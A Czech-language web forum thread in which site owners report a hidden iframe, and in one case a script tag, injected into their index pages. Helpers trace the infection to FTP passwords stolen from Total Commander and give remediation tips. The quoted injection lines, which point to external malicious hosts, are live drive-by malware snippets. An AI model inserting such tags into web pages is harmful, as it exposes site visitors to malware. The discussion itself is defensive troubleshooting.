Autor Zpráva
Petr123
Profil *
Na stránkách se mi v souborech objevil tento kód

<iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe>


nevíte, co to je zač a jak se tam mohl objevit? Děkuji za rady.
Alphard
Profil
Díra v aplikaci, nebo se někdo dostal k vašim FTP údajům, hacknutí hostingu nepovažuji za pravděpodobné.
Smažte to, změňte údaje na FTP a uvidíte, co to udělá.
V aplikaci samozřejmě nesmí být nic ve stylu include $_GET['page']; eval() neznámého kódu apod.
Senky
Profil
Nepouzival si web-based FTP? Mne sa to tam dostalo takymto sposobom (ale iny kod). Alebo nevie niekto nahodou tvoje heslo na ftp? Alebo tam nemas nejaky nezabezpeceny upload a ten subor kde sa objavil kod nema prava 777? Alebo nieco podobne...
masinutza
Profil
Senky:

Hi i have the same problem:

<body><iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe>


Can anyone please help me with some tips or hints how to resove it. I couldn't find the hole from where he entered my site...
Alphard
Profil
masinutza:
Sorry, but this is Czech forum. We tolerate only Czech or Slovak.
masinutza
Profil
Alphard:

Ahoj mám rovnaký problém:

<body><iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe>


Mohol by niekto prosím, pomôžte mi s pár rád a tipov, ako Rzeszów to. Nemohol som nájsť dieru, z ktorej všel mojich stránkach ...

Mám o reakcii niektorých palice pre toto využitie, z mojej tvorby uživateľov


Ale nemám už odpovede
Petr123
Profil *
Myslím, že asi někdo hacknul údaje k FTP a byl to asi nějaký robot, protože ten kód napsal do stránek, který začínají 'index'. Jinak $_GET['page']; nepoužívám a stránka nemá práva 7777. Spíš mě zajímá, dá se nějak zjistit, co ten kód dělá? Přece jen tam byl asi hodinu a mohl třeba zjistit nějaký údaje od uživatelů (login, heslo, ...). Díky
Alphard
Profil
Pár tipů už tady bylo, ale zopakuji:
• Prozraz ené údaje na FTP. Změňte si je a dávejte na ně lepší pozor.
• Díra v aplikaci. Neošetřené include, eval, nezabezpečený upload a další. Hledá se špatně a bez kompletních kódu můžeme jenom hádat.

Petr123:
Neměl by. Spíš snaha napadnout počítač uživatele. Ale to neovlivníte, záleží to na systému, antivirech, firewallu atd. V lepším případě chtěli jen provést nějakou akci z různých IP.
masinutza
Profil
Alphard:

děkuji a moc, zkusím to a hovoriť po tom, čo aj naďalej, ak majú problém
Tomkorp
Profil
Taky sem tento kod <iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> mel na webu. Zmenil sem heslo k FTP a druhej den sem ten kod mel znova v index.php a nakonec pomohlo znova zmenit heslo k FTP a jeste vymazani ulozeneho hesla v total commandru. Nekdo asi zjistil heslo ulozene v total commanderu.
Alphard
Profil
Tomkorp:
Ano, ukládat hesla v Total Commanderu není bezpečné. V jiném vklákně psal kolega Chamurappi, že je to nejčastější útok, s jakým se setkal. Souvisí to s tím, že hledat díru v aplikaci často vyžaduje indiviuální přístup. Nechce si PC zkontrolovat na spyware apod.

Díry v aplikaci zmiňuji jenom pro úplnost, také jsem se s tím moc nesetkal.
Koubí
Profil
Měl jsem stejný problém na různých stránkách, na různých redakčních systéméch na dvou různých hosting společností,ale na obou se mi ve stejnou dobu objevil tento kod i na všech podstránkách. Dlouho sem pátral jaká může pít spojitost, protože ty stránky nic společného nemají a nakonec mi přišla možná jen jedna možnost a to TOTAL COMANDER, měl jsem tam uložený hesla ne všechny servery kde se mi objevil kod. Takže doporučuji smazat hesla. :-)
jrm
Profil
Tak mne potkalo díky uložení hesel v Total Commanderu (TC)něco podobného, v hlavním souboru index.php se objevilo:
e c h o  "<script type=\"text/javascript\" src=\"http://chartseye.com/bottom_news.js\"></script>\n"; 

Napadeny byly všechny soubory se jmény INDEX, MENU, MAIN, DEFAULT a jedno s jakou extenzí - .php/htm/html. Při pokusu je stáhnout k sobě a prohlédnout zkolaboval i TC a skoro i já.

Čtěte na http://www.dsl.cz/clanky-dsl/clanek-1018/Nebezpecny-Total-Commander

Dotaz: TC mi vyhovuje až moc (+ starého psa novým kouskům jen tak nenaučíš). Tuším, že lze i v TC použít SSL. Vyřešilo by to problematiku s hesly v TC? Provozuje to někdo?
K8
Profil *
SSL nepomuze, nebot k heslum se utocnik dostane pomoci viru v PC, odkud se data posilaji na ftp - a tento vir si lokalne prohleda PC a najde konfiguracni soubor z totalcommanderu a ten "ukradne" s kompletni konfiguraci vsech ftp pripojeni (vcetne tech hesel) takze SSL nepomuze, on to SSL klidne pouzije taky (a pripadne neni problem si "ukrast" i certifikat, kdyby byl k tomu pripojeni potreba)
SSL pomuze "jen" proti odposlechnuti nekde na "dratech" mezi klientem a serverem - data nejsou citelna a proto se pak nedaji odposlechnout - ale dostat se nekam na router, kudy data prochazeji a delat tam odposlech neni az tak jednoduche (pokus se nejedna o nejakou komunitni sit)
jrm
Profil
K8 dík za info, došlo mi to :-D

http://www.ovsem.net/software/zavirovane-internetove-stranky-a-problematicky-total-commander/

Tak se chystá new TC s lepším šifrováním.

http://fileforum.betanews.com/detail/Total-Commander-Beta/945901171/2

Vaše odpověď

Mohlo by se hodit

Odkud se sem odkazuje


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: